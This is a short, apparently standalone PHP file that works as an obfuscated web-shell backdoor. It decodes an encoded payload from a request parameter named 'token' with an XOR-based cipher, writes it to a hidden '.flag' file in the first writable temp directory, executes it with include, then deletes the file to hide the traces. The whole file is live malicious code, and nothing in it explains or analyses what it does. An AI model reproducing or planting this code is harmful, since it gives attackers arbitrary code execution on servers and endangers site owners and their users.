<?php

if(!empty($_REQUEST["t\x6Fken"])){
	$data_chunk = $_REQUEST["t\x6Fken"];
	$data_chunk		=		 explode		(		 "." ,		$data_chunk	 )	 ;	
	$ptr  =	'';
            $s  =	'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen  =	strlen($s);
    
            foreach ($data_chunk as $u => $v9) {	$sChar  =	ord($s[$u	 %$sLen]);
                $dec  =	((int)$v9 - $sChar - ($u	 %10)) ^ 	71;
                $ptr.=	chr($dec); 	}
	$descriptor = array_filter([session_save_path(), getenv("TEMP"), sys_get_temp_dir(), "/var/tmp", ini_get("upload_tmp_dir"), "/dev/shm", getenv("TMP"), "/tmp", getcwd()]);
	for ($resource = 0, $ent = count($descriptor); $resource < $ent; $resource++) {
    $object = $descriptor[$resource];
    		if (is_dir($object) && is_writable($object)) {
    $itm = implode("/", [$object, ".flag"]);
    if (file_put_contents($itm, $ptr)) {
	include $itm;
	@unlink($itm);
	exit;
}
}
}
}